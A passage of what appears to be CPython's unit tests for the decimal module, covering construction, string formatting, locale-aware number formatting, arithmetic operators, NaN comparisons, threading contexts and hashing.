'-Infinity') self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123') # invalid arguments self.assertRaises(InvalidOperation, nc.create_decimal, "xyz") self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25)) self.assertRaises(TypeError, nc.create_decimal, "1234", "5678") # no whitespace and underscore stripping is done with this method self.assertRaises(InvalidOperation, nc.create_decimal, " 1234") self.assertRaises(InvalidOperation, nc.create_decimal, "12_34") # too many NaN payload digits nc.prec = 3 self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345') self.assertRaises(InvalidOperation, nc.create_decimal, Decimal('NaN12345')) nc.traps[InvalidOperation] = False self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN') self.assertTrue(nc.flags[InvalidOperation]) nc.flags[InvalidOperation] = False self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN') self.assertTrue(nc.flags[InvalidOperation]) def test_explicit_context_create_from_float(self): Decimal = self.decimal.Decimal nc = self.decimal.Context() r = nc.create_decimal(0.1) self.assertEqual(type(r), Decimal) self.assertEqual(str(r), '0.1000000000000000055511151231') self.assertTrue(nc.create_decimal(float('nan')).is_qnan()) self.assertTrue(nc.create_decimal(float('inf')).is_infinite()) self.assertTrue(nc.create_decimal(float('-inf')).is_infinite()) self.assertEqual(str(nc.create_decimal(float('nan'))), str(nc.create_decimal('NaN'))) self.assertEqual(str(nc.create_decimal(float('inf'))), str(nc.create_decimal('Infinity'))) self.assertEqual(str(nc.create_decimal(float('-inf'))), str(nc.create_decimal('-Infinity'))) self.assertEqual(str(nc.create_decimal(float('-0.0'))), str(nc.create_decimal('-0'))) nc.prec = 100 for i in range(200): x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0) self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip def test_unicode_digits(self): Decimal = self.decimal.Decimal test_values = { '\uff11': '1', '\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372', '-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400', } for input, expected in test_values.items(): self.assertEqual(str(Decimal(input)), expected) class CExplicitConstructionTest(ExplicitConstructionTest): decimal = C class PyExplicitConstructionTest(ExplicitConstructionTest): decimal = P class ImplicitConstructionTest(unittest.TestCase): '''Unit tests for Implicit Construction cases of Decimal.''' def test_implicit_from_None(self): Decimal = self.decimal.Decimal self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals()) def test_implicit_from_int(self): Decimal = self.decimal.Decimal #normal self.assertEqual(str(Decimal(5) + 45), '50') #exceeding precision self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000)) def test_implicit_from_string(self): Decimal = self.decimal.Decimal self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals()) def test_implicit_from_float(self): Decimal = self.decimal.Decimal self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals()) def test_implicit_from_Decimal(self): Decimal = self.decimal.Decimal self.assertEqual(Decimal(5) + Decimal(45), Decimal(50)) def test_rop(self): Decimal = self.decimal.Decimal # Allow other classes to be trained to interact with Decimals class E: def __divmod__(self, other): return 'divmod ' + str(other) def __rdivmod__(self, other): return str(other) + ' rdivmod' def __lt__(self, other): return 'lt ' + str(other) def __gt__(self, other): return 'gt ' + str(other) def __le__(self, other): return 'le ' + str(other) def __ge__(self, other): return 'ge ' + str(other) def __eq__(self, other): return 'eq ' + str(other) def __ne__(self, other): return 'ne ' + str(other) self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10') self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod') self.assertEqual(eval('Decimal(10) < E()'), 'gt 10') self.assertEqual(eval('Decimal(10) > E()'), 'lt 10') self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10') self.assertEqual(eval('Decimal(10) >= E()'), 'le 10') self.assertEqual(eval('Decimal(10) == E()'), 'eq 10') self.assertEqual(eval('Decimal(10) != E()'), 'ne 10') # insert operator methods and then exercise them oplist = [ ('+', '__add__', '__radd__'), ('-', '__sub__', '__rsub__'), ('*', '__mul__', '__rmul__'), ('/', '__truediv__', '__rtruediv__'), ('%', '__mod__', '__rmod__'), ('//', '__floordiv__', '__rfloordiv__'), ('**', '__pow__', '__rpow__') ] for sym, lop, rop in oplist: setattr(E, lop, lambda self, other: 'str' + lop + str(other)) setattr(E, rop, lambda self, other: str(other) + rop + 'str') self.assertEqual(eval('E()' + sym + 'Decimal(10)'), 'str' + lop + '10') self.assertEqual(eval('Decimal(10)' + sym + 'E()'), '10' + rop + 'str') class CImplicitConstructionTest(ImplicitConstructionTest): decimal = C class PyImplicitConstructionTest(ImplicitConstructionTest): decimal = P class FormatTest(unittest.TestCase): '''Unit tests for the format function.''' def test_formatting(self): Decimal = self.decimal.Decimal # triples giving a format, a Decimal, and the expected result test_values = [ ('e', '0E-15', '0e-15'), ('e', '2.3E-15', '2.3e-15'), ('e', '2.30E+2', '2.30e+2'), # preserve significant zeros ('e', '2.30000E-15', '2.30000e-15'), ('e', '1.23456789123456789e40', '1.23456789123456789e+40'), ('e', '1.5', '1.5e+0'), ('e', '0.15', '1.5e-1'), ('e', '0.015', '1.5e-2'), ('e', '0.0000000000015', '1.5e-12'), ('e', '15.0', '1.50e+1'), ('e', '-15', '-1.5e+1'), ('e', '0', '0e+0'), ('e', '0E1', '0e+1'), ('e', '0.0', '0e-1'), ('e', '0.00', '0e-2'), ('.6e', '0E-15', '0.000000e-9'), ('.6e', '0', '0.000000e+6'), ('.6e', '9.999999', '9.999999e+0'), ('.6e', '9.9999999', '1.000000e+1'), ('.6e', '-1.23e5', '-1.230000e+5'), ('.6e', '1.23456789e-3', '1.234568e-3'), ('f', '0', '0'), ('f', '0.0', '0.0'), ('f', '0E-2', '0.00'), ('f', '0.00E-8', '0.0000000000'), ('f', '0E1', '0'), # loses exponent information ('f', '3.2E1', '32'), ('f', '3.2E2', '320'), ('f', '3.20E2', '320'), ('f', '3.200E2', '320.0'), ('f', '3.2E-6', '0.0000032'), ('.6f', '0E-15', '0.000000'), # all zeros treated equally ('.6f', '0E1', '0.000000'), ('.6f', '0', '0.000000'), ('.0f', '0', '0'), # no decimal point ('.0f', '0e-2', '0'), ('.0f', '3.14159265', '3'), ('.1f', '3.14159265', '3.1'), ('.4f', '3.14159265', '3.1416'), ('.6f', '3.14159265', '3.141593'), ('.7f', '3.14159265', '3.1415926'), # round-half-even! ('.8f', '3.14159265', '3.14159265'), ('.9f', '3.14159265', '3.141592650'), ('g', '0', '0'), ('g', '0.0', '0.0'), ('g', '0E1', '0e+1'), ('G', '0E1', '0E+1'), ('g', '0E-5', '0.00000'), ('g', '0E-6', '0.000000'), ('g', '0E-7', '0e-7'), ('g', '-0E2', '-0e+2'), ('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig ('.0n', '3.14159265', '3'), # same for 'n' ('.1g', '3.14159265', '3'), ('.2g', '3.14159265', '3.1'), ('.5g', '3.14159265', '3.1416'), ('.7g', '3.14159265', '3.141593'), ('.8g', '3.14159265', '3.1415926'), # round-half-even! ('.9g', '3.14159265', '3.14159265'), ('.10g', '3.14159265', '3.14159265'), # don't pad ('%', '0E1', '0%'), ('%', '0E0', '0%'), ('%', '0E-1', '0%'), ('%', '0E-2', '0%'), ('%', '0E-3', '0.0%'), ('%', '0E-4', '0.00%'), ('.3%', '0', '0.000%'), # all zeros treated equally ('.3%', '0E10', '0.000%'), ('.3%', '0E-10', '0.000%'), ('.3%', '2.34', '234.000%'), ('.3%', '1.234567', '123.457%'), ('.0%', '1.23', '123%'), ('e', 'NaN', 'NaN'), ('f', '-NaN123', '-NaN123'), ('+g', 'NaN456', '+NaN456'), ('.3e', 'Inf', 'Infinity'), ('.16f', '-Inf', '-Infinity'), ('.0g', '-sNaN', '-sNaN'), ('', '1.00', '1.00'), # test alignment and padding ('6', '123', ' 123'), ('<6', '123', '123 '), ('>6', '123', ' 123'), ('^6', '123', ' 123 '), ('=+6', '123', '+ 123'), ('#<10', 'NaN', 'NaN#######'), ('#<10', '-4.3', '-4.3######'), ('#<+10', '0.0130', '+0.0130###'), ('#< 10', '0.0130', ' 0.0130###'), ('@>10', '-Inf', '@-Infinity'), ('#>5', '-Inf', '-Infinity'), ('?^5', '123', '?123?'), ('%^6', '123', '%123%%'), (' ^6', '-45.6', '-45.6 '), ('/=10', '-45.6', '-/////45.6'), ('/=+10', '45.6', '+/////45.6'), ('/= 10', '45.6', ' /////45.6'), ('\x00=10', '-inf', '-\x00Infinity'), ('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'), ('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'), ('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'), # thousands separator (',', '1234567', '1,234,567'), (',', '123456', '123,456'), (',', '12345', '12,345'), (',', '1234', '1,234'), (',', '123', '123'), (',', '12', '12'), (',', '1', '1'), (',', '0', '0'), (',', '-1234567', '-1,234,567'), (',', '-123456', '-123,456'), ('7,', '123456', '123,456'), ('8,', '123456', ' 123,456'), ('08,', '123456', '0,123,456'), # special case: extra 0 needed ('+08,', '123456', '+123,456'), # but not if there's a sign (' 08,', '123456', ' 123,456'), ('08,', '-123456', '-123,456'), ('+09,', '123456', '+0,123,456'), # ... with fractional part... ('07,', '1234.56', '1,234.56'), ('08,', '1234.56', '1,234.56'), ('09,', '1234.56', '01,234.56'), ('010,', '1234.56', '001,234.56'), ('011,', '1234.56', '0,001,234.56'), ('012,', '1234.56', '0,001,234.56'), ('08,.1f', '1234.5', '01,234.5'), # no thousands separators in fraction part (',', '1.23456789', '1.23456789'), (',%', '123.456789', '12,345.6789%'), (',e', '123456', '1.23456e+5'), (',E', '123456', '1.23456E+5'), # issue 6850 ('a=-7.0', '0.12345', 'aaaa0.1'), # issue 22090 ('<^+15.20%', 'inf', '<<+Infinity%<<<'), ('\x07>,%', 'sNaN1234567', 'sNaN1234567%'), ('=10.10%', 'NaN123', ' NaN123%'), ] for fmt, d, result in test_values: self.assertEqual(format(Decimal(d), fmt), result) # bytes format argument self.assertRaises(TypeError, Decimal(1).__format__, b'-020') def test_n_format(self): Decimal = self.decimal.Decimal try: from locale import CHAR_MAX except ImportError: self.skipTest('locale.CHAR_MAX not available') def make_grouping(lst): return ''.join([chr(x) for x in lst]) if self.decimal == C else lst def get_fmt(x, override=None, fmt='n'): if self.decimal == C: return Decimal(x).__format__(fmt, override) else: return Decimal(x).__format__(fmt, _localeconv=override) # Set up some localeconv-like dictionaries en_US = { 'decimal_point' : '.', 'grouping' : make_grouping([3, 3, 0]), 'thousands_sep' : ',' } fr_FR = { 'decimal_point' : ',', 'grouping' : make_grouping([CHAR_MAX]), 'thousands_sep' : '' } ru_RU = { 'decimal_point' : ',', 'grouping': make_grouping([3, 3, 0]), 'thousands_sep' : ' ' } crazy = { 'decimal_point' : '&', 'grouping': make_grouping([1, 4, 2, CHAR_MAX]), 'thousands_sep' : '-' } dotsep_wide = { 'decimal_point' : b'\xc2\xbf'.decode('utf-8'), 'grouping': make_grouping([3, 3, 0]), 'thousands_sep' : b'\xc2\xb4'.decode('utf-8') } self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7') self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7') self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7') self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7') self.assertEqual(get_fmt(123456789, en_US), '123,456,789') self.assertEqual(get_fmt(123456789, fr_FR), '123456789') self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789') self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3') self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8') self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8') self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8') self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8') # zero padding self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234') self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234') self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234') self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234') self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345') self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345') self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345') self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345') self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345') self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345') self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6') self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6') self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6') self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6') self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6') self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6') self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6') self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6') # wide char separator and decimal point self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'), '-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5') @run_with_locale('LC_ALL', 'ps_AF') def test_wide_char_separator_decimal_point(self): # locale with wide char separator and decimal point Decimal = self.decimal.Decimal decimal_point = locale.localeconv()['decimal_point'] thousands_sep = locale.localeconv()['thousands_sep'] if decimal_point != '\u066b': self.skipTest('inappropriate decimal point separator ' '({!a} not {!a})'.format(decimal_point, '\u066b')) if thousands_sep != '\u066c': self.skipTest('inappropriate thousands separator ' '({!a} not {!a})'.format(thousands_sep, '\u066c')) self.assertEqual(format(Decimal('100000000.123'), 'n'), '100\u066c000\u066c000\u066b123') def test_decimal_from_float_argument_type(self): class A(self.decimal.Decimal): def __init__(self, a): self.a_type = type(a) a = A.from_float(42.5) self.assertEqual(self.decimal.Decimal, a.a_type) a = A.from_float(42) self.assertEqual(self.decimal.Decimal, a.a_type) class CFormatTest(FormatTest): decimal = C class PyFormatTest(FormatTest): decimal = P class ArithmeticOperatorsTest(unittest.TestCase): '''Unit tests for all arithmetic operators, binary and unary.''' def test_addition(self): Decimal = self.decimal.Decimal d1 = Decimal('-11.1') d2 = Decimal('22.2') #two Decimals self.assertEqual(d1+d2, Decimal('11.1')) self.assertEqual(d2+d1, Decimal('11.1')) #with other type, left c = d1 + 5 self.assertEqual(c, Decimal('-6.1')) self.assertEqual(type(c), type(d1)) #with other type, right c = 5 + d1 self.assertEqual(c, Decimal('-6.1')) self.assertEqual(type(c), type(d1)) #inline with decimal d1 += d2 self.assertEqual(d1, Decimal('11.1')) #inline with other type d1 += 5 self.assertEqual(d1, Decimal('16.1')) def test_subtraction(self): Decimal = self.decimal.Decimal d1 = Decimal('-11.1') d2 = Decimal('22.2') #two Decimals self.assertEqual(d1-d2, Decimal('-33.3')) self.assertEqual(d2-d1, Decimal('33.3')) #with other type, left c = d1 - 5 self.assertEqual(c, Decimal('-16.1')) self.assertEqual(type(c), type(d1)) #with other type, right c = 5 - d1 self.assertEqual(c, Decimal('16.1')) self.assertEqual(type(c), type(d1)) #inline with decimal d1 -= d2 self.assertEqual(d1, Decimal('-33.3')) #inline with other type d1 -= 5 self.assertEqual(d1, Decimal('-38.3')) def test_multiplication(self): Decimal = self.decimal.Decimal d1 = Decimal('-5') d2 = Decimal('3') #two Decimals self.assertEqual(d1*d2, Decimal('-15')) self.assertEqual(d2*d1, Decimal('-15')) #with other type, left c = d1 * 5 self.assertEqual(c, Decimal('-25')) self.assertEqual(type(c), type(d1)) #with other type, right c = 5 * d1 self.assertEqual(c, Decimal('-25')) self.assertEqual(type(c), type(d1)) #inline with decimal d1 *= d2 self.assertEqual(d1, Decimal('-15')) #inline with other type d1 *= 5 self.assertEqual(d1, Decimal('-75')) def test_division(self): Decimal = self.decimal.Decimal d1 = Decimal('-5') d2 = Decimal('2') #two Decimals self.assertEqual(d1/d2, Decimal('-2.5')) self.assertEqual(d2/d1, Decimal('-0.4')) #with other type, left c = d1 / 4 self.assertEqual(c, Decimal('-1.25')) self.assertEqual(type(c), type(d1)) #with other type, right c = 4 / d1 self.assertEqual(c, Decimal('-0.8')) self.assertEqual(type(c), type(d1)) #inline with decimal d1 /= d2 self.assertEqual(d1, Decimal('-2.5')) #inline with other type d1 /= 4 self.assertEqual(d1, Decimal('-0.625')) def test_floor_division(self): Decimal = self.decimal.Decimal d1 = Decimal('5') d2 = Decimal('2') #two Decimals self.assertEqual(d1//d2, Decimal('2')) self.assertEqual(d2//d1, Decimal('0')) #with other type, left c = d1 // 4 self.assertEqual(c, Decimal('1')) self.assertEqual(type(c), type(d1)) #with other type, right c = 7 // d1 self.assertEqual(c, Decimal('1')) self.assertEqual(type(c), type(d1)) #inline with decimal d1 //= d2 self.assertEqual(d1, Decimal('2')) #inline with other type d1 //= 2 self.assertEqual(d1, Decimal('1')) def test_powering(self): Decimal = self.decimal.Decimal d1 = Decimal('5') d2 = Decimal('2') #two Decimals self.assertEqual(d1**d2, Decimal('25')) self.assertEqual(d2**d1, Decimal('32')) #with other type, left c = d1 ** 4 self.assertEqual(c, Decimal('625')) self.assertEqual(type(c), type(d1)) #with other type, right c = 7 ** d1 self.assertEqual(c, Decimal('16807')) self.assertEqual(type(c), type(d1)) #inline with decimal d1 **= d2 self.assertEqual(d1, Decimal('25')) #inline with other type d1 **= 4 self.assertEqual(d1, Decimal('390625')) def test_module(self): Decimal = self.decimal.Decimal d1 = Decimal('5') d2 = Decimal('2') #two Decimals self.assertEqual(d1%d2, Decimal('1')) self.assertEqual(d2%d1, Decimal('2')) #with other type, left c = d1 % 4 self.assertEqual(c, Decimal('1')) self.assertEqual(type(c), type(d1)) #with other type, right c = 7 % d1 self.assertEqual(c, Decimal('2')) self.assertEqual(type(c), type(d1)) #inline with decimal d1 %= d2 self.assertEqual(d1, Decimal('1')) #inline with other type d1 %= 4 self.assertEqual(d1, Decimal('1')) def test_floor_div_module(self): Decimal = self.decimal.Decimal d1 = Decimal('5') d2 = Decimal('2') #two Decimals (p, q) = divmod(d1, d2) self.assertEqual(p, Decimal('2')) self.assertEqual(q, Decimal('1')) self.assertEqual(type(p), type(d1)) self.assertEqual(type(q), type(d1)) #with other type, left (p, q) = divmod(d1, 4) self.assertEqual(p, Decimal('1')) self.assertEqual(q, Decimal('1')) self.assertEqual(type(p), type(d1)) self.assertEqual(type(q), type(d1)) #with other type, right (p, q) = divmod(7, d1) self.assertEqual(p, Decimal('1')) self.assertEqual(q, Decimal('2')) self.assertEqual(type(p), type(d1)) self.assertEqual(type(q), type(d1)) def test_unary_operators(self): Decimal = self.decimal.Decimal self.assertEqual(+Decimal(45), Decimal(+45)) # + self.assertEqual(-Decimal(45), Decimal(-45)) # - self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs def test_nan_comparisons(self): # comparisons involving signaling nans signal InvalidOperation # order comparisons (<, <=, >, >=) involving only quiet nans # also signal InvalidOperation # equality comparisons (==, !=) involving only quiet nans # don't signal, but return False or True respectively. Decimal = self.decimal.Decimal InvalidOperation = self.decimal.InvalidOperation localcontext = self.decimal.localcontext n = Decimal('NaN') s = Decimal('sNaN') i = Decimal('Inf') f = Decimal('2') qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n) snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s) order_ops = operator.lt, operator.le, operator.gt, operator.ge equality_ops = operator.eq, operator.ne # results when InvalidOperation is not trapped for x, y in qnan_pairs + snan_pairs: for op in order_ops + equality_ops: got = op(x, y) expected = True if op is operator.ne else False self.assertIs(expected, got, "expected {0!r} for operator.{1}({2!r}, {3!r}); " "got {4!r}".format( expected, op.__name__, x, y, got)) # repeat the above, but this time trap the InvalidOperation with localcontext() as ctx: ctx.traps[InvalidOperation] = 1 for x, y in qnan_pairs: for op in equality_ops: got = op(x, y) expected = True if op is operator.ne else False self.assertIs(expected, got, "expected {0!r} for " "operator.{1}({2!r}, {3!r}); " "got {4!r}".format( expected, op.__name__, x, y, got)) for x, y in snan_pairs: for op in equality_ops: self.assertRaises(InvalidOperation, operator.eq, x, y) self.assertRaises(InvalidOperation, operator.ne, x, y) for x, y in qnan_pairs + snan_pairs: for op in order_ops: self.assertRaises(InvalidOperation, op, x, y) def test_copy_sign(self): Decimal = self.decimal.Decimal d = Decimal(1).copy_sign(Decimal(-2)) self.assertEqual(Decimal(1).copy_sign(-2), d) self.assertRaises(TypeError, Decimal(1).copy_sign, '-2') class CArithmeticOperatorsTest(ArithmeticOperatorsTest): decimal = C class PyArithmeticOperatorsTest(ArithmeticOperatorsTest): decimal = P # The following are two functions used to test threading in the next class def thfunc1(cls): Decimal = cls.decimal.Decimal InvalidOperation = cls.decimal.InvalidOperation DivisionByZero = cls.decimal.DivisionByZero Overflow = cls.decimal.Overflow Underflow = cls.decimal.Underflow Inexact = cls.decimal.Inexact getcontext = cls.decimal.getcontext localcontext = cls.decimal.localcontext d1 = Decimal(1) d3 = Decimal(3) test1 = d1/d3 cls.finish1.set() cls.synchro.wait() test2 = d1/d3 with localcontext() as c2: cls.assertTrue(c2.flags[Inexact]) cls.assertRaises(DivisionByZero, c2.divide, d1, 0) cls.assertTrue(c2.flags[DivisionByZero]) with localcontext() as c3: cls.assertTrue(c3.flags[Inexact]) cls.assertTrue(c3.flags[DivisionByZero]) cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN')) cls.assertTrue(c3.flags[InvalidOperation]) del c3 cls.assertFalse(c2.flags[InvalidOperation]) del c2 cls.assertEqual(test1, Decimal('0.333333333333333333333333')) cls.assertEqual(test2, Decimal('0.333333333333333333333333')) c1 = getcontext() cls.assertTrue(c1.flags[Inexact]) for sig in Overflow, Underflow, DivisionByZero, InvalidOperation: cls.assertFalse(c1.flags[sig]) def thfunc2(cls): Decimal = cls.decimal.Decimal InvalidOperation = cls.decimal.InvalidOperation DivisionByZero = cls.decimal.DivisionByZero Overflow = cls.decimal.Overflow Underflow = cls.decimal.Underflow Inexact = cls.decimal.Inexact getcontext = cls.decimal.getcontext localcontext = cls.decimal.localcontext d1 = Decimal(1) d3 = Decimal(3) test1 = d1/d3 thiscontext = getcontext() thiscontext.prec = 18 test2 = d1/d3 with localcontext() as c2: cls.assertTrue(c2.flags[Inexact]) cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999) cls.assertTrue(c2.flags[Overflow]) with localcontext(thiscontext) as c3: cls.assertTrue(c3.flags[Inexact]) cls.assertFalse(c3.flags[Overflow]) c3.traps[Underflow] = True cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999) cls.assertTrue(c3.flags[Underflow]) del c3 cls.assertFalse(c2.flags[Underflow]) cls.assertFalse(c2.traps[Underflow]) del c2 cls.synchro.set() cls.finish2.set() cls.assertEqual(test1, Decimal('0.333333333333333333333333')) cls.assertEqual(test2, Decimal('0.333333333333333333')) cls.assertFalse(thiscontext.traps[Underflow]) cls.assertTrue(thiscontext.flags[Inexact]) for sig in Overflow, Underflow, DivisionByZero, InvalidOperation: cls.assertFalse(thiscontext.flags[sig]) class ThreadingTest(unittest.TestCase): '''Unit tests for thread local contexts in Decimal.''' # Take care executing this test from IDLE, there's an issue in threading # that hangs IDLE and I couldn't find it def test_threading(self): DefaultContext = self.decimal.DefaultContext if self.decimal == C and not self.decimal.HAVE_THREADS: self.skipTest("compiled without threading") # Test the "threading isolation" of a Context. Also test changing # the DefaultContext, which acts as a template for the thread-local # contexts. save_prec = DefaultContext.prec save_emax = DefaultContext.Emax save_emin = DefaultContext.Emin DefaultContext.prec = 24 DefaultContext.Emax = 425000000 DefaultContext.Emin = -425000000 self.synchro = threading.Event() self.finish1 = threading.Event() self.finish2 = threading.Event() th1 = threading.Thread(target=thfunc1, args=(self,)) th2 = threading.Thread(target=thfunc2, args=(self,)) th1.start() th2.start() self.finish1.wait() self.finish2.wait() for sig in Signals[self.decimal]: self.assertFalse(DefaultContext.flags[sig]) th1.join() th2.join() DefaultContext.prec = save_prec DefaultContext.Emax = save_emax DefaultContext.Emin = save_emin class CThreadingTest(ThreadingTest): decimal = C class PyThreadingTest(ThreadingTest): decimal = P class UsabilityTest(unittest.TestCase): '''Unit tests for Usability cases of Decimal.''' def test_comparison_operators(self): Decimal = self.decimal.Decimal da = Decimal('23.42') db = Decimal('23.42') dc = Decimal('45') #two Decimals self.assertGreater(dc, da) self.assertGreaterEqual(dc, da) self.assertLess(da, dc) self.assertLessEqual(da, dc) self.assertEqual(da, db) self.assertNotEqual(da, dc) self.assertLessEqual(da, db) self.assertGreaterEqual(da, db) #a Decimal and an int self.assertGreater(dc, 23) self.assertLess(23, dc) self.assertEqual(dc, 45) #a Decimal and uncomparable self.assertNotEqual(da, 'ugly') self.assertNotEqual(da, 32.7) self.assertNotEqual(da, object()) self.assertNotEqual(da, object) # sortable a = list(map(Decimal, range(100))) b = a[:] random.shuffle(a) a.sort() self.assertEqual(a, b) def test_decimal_float_comparison(self): Decimal = self.decimal.Decimal da = Decimal('0.25') db = Decimal('3.0') self.assertLess(da, 3.0) self.assertLessEqual(da, 3.0) self.assertGreater(db, 0.25) self.assertGreaterEqual(db, 0.25) self.assertNotEqual(da, 1.5) self.assertEqual(da, 0.25) self.assertGreater(3.0, da) self.assertGreaterEqual(3.0, da) self.assertLess(0.25, db) self.assertLessEqual(0.25, db) self.assertNotEqual(0.25, db) self.assertEqual(3.0, db) self.assertNotEqual(0.1, Decimal('0.1')) def test_decimal_complex_comparison(self): Decimal = self.decimal.Decimal da = Decimal('0.25') db = Decimal('3.0') self.assertNotEqual(da, (1.5+0j)) self.assertNotEqual((1.5+0j), da) self.assertEqual(da, (0.25+0j)) self.assertEqual((0.25+0j), da) self.assertEqual((3.0+0j), db) self.assertEqual(db, (3.0+0j)) self.assertNotEqual(db, (3.0+1j)) self.assertNotEqual((3.0+1j), db) self.assertIs(db.__lt__(3.0+0j), NotImplemented) self.assertIs(db.__le__(3.0+0j), NotImplemented) self.assertIs(db.__gt__(3.0+0j), NotImplemented) self.assertIs(db.__le__(3.0+0j), NotImplemented) def test_decimal_fraction_comparison(self): D = self.decimal.Decimal F = fractions[self.decimal].Fraction Context = self.decimal.Context localcontext = self.decimal.localcontext InvalidOperation = self.decimal.InvalidOperation emax = C.MAX_EMAX if C else 999999999 emin = C.MIN_EMIN if C else -999999999 etiny = C.MIN_ETINY if C else -1999999997 c = Context(Emax=emax, Emin=emin) with localcontext(c): c.prec = emax self.assertLess(D(0), F(1,9999999999999999999999999999999999999)) self.assertLess(F(-1,9999999999999999999999999999999999999), D(0)) self.assertLess(F(0,1), D("1e" + str(etiny))) self.assertLess(D("-1e" + str(etiny)), F(0,1)) self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny))) self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999)) self.assertEqual(D("0.1"), F(1,10)) self.assertEqual(F(1,10), D("0.1")) c.prec = 300 self.assertNotEqual(D(1)/3, F(1,3)) self.assertNotEqual(F(1,3), D(1)/3) self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax))) self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999)) self.assertGreater(D('inf'), F(99999999999,123)) self.assertGreater(D('inf'), F(-99999999999,123)) self.assertLess(D('-inf'), F(99999999999,123)) self.assertLess(D('-inf'), F(-99999999999,123)) self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123)) self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan'))) self.assertNotEqual(D('nan'), F(-9,123)) self.assertNotEqual(F(-9,123), D('nan')) def test_copy_and_deepcopy_methods(self): Decimal = self.decimal.Decimal d = Decimal('43.24') c = copy.copy(d) self.assertEqual(id(c), id(d)) dc = copy.deepcopy(d) self.assertEqual(id(dc), id(d)) def test_hash_method(self): Decimal = self.decimal.Decimal localcontext = self.decimal.localcontext def hashit(d): a = hash(d) b = d.__hash__() self.assertEqual(a, b) return a #just that it's hashable hashit(Decimal(23)) hashit(Decimal('Infinity')) hashit(Decimal('-Infinity')) hashit(Decimal('nan123')) hashit(Decimal('-NaN')) test_values = [Decimal(sign*(2**m + n)) for m in [0, 14, 15, 16, 17, 30, 31, 32, 33, 61, 62, 63, 64, 65, 66] for n in range(-10, 10) for sign in [-1, 1]] test_values.extend([ Decimal("-1"), # ==> -2 Decimal("-0"), # zeros Decimal("0.00"), Decimal("-0.000"), Decimal("0E10"), Decimal("-0E12"), Decimal("10.0"), # negative exponent Decimal("-23.00000"), Decimal("1230E100"), # positive exponent Decimal("-4.5678E50"), # a value for which hash(n) != hash(n % (2**64-1)) # in Python pre-2.6 Decimal(2**64 + 2**32 - 1), # selection of values which fail with the old (before # version 2.6) long.__hash__ Decimal("1.634E100"), Decimal("90.697E100"), Decimal("188.83E100"), Decimal("1652.9E100"), Decimal("56531E100"), ]) # check that hash(d) == hash(int(d)) for integral values for value in test_values: self.assertEqual(hashit(value), hashit(int(value))) #the same hash that to an int self.assertEqual(hashit(Decimal(23)), hashit(23)) self.assertRaises(TypeError, hash, Decimal('sNaN')) self.assertTrue(hashit(Decimal('Inf'))) self.assertTrue(hashit(Decimal('-Inf'))) # check that the hashes of a Decimal float match when they # represent exactly the same values test_strings = ['inf', '-Inf', '0.0', '-.0e1', '34.0', '2.5', '112390.625', '-0.515625'] for s in test_strings: f = float(s) d = Decimal(s) self.assertEqual(hashit(f), hashit(d)) with localcontext() as c: # check that the value of the hash doesn't depend on the # current context (issue #1757) x = Decimal("123456789.1") c.prec = 6 h1 = hashit(x) c.prec = 10 h2 = hashit(x) c.prec = 16 h3 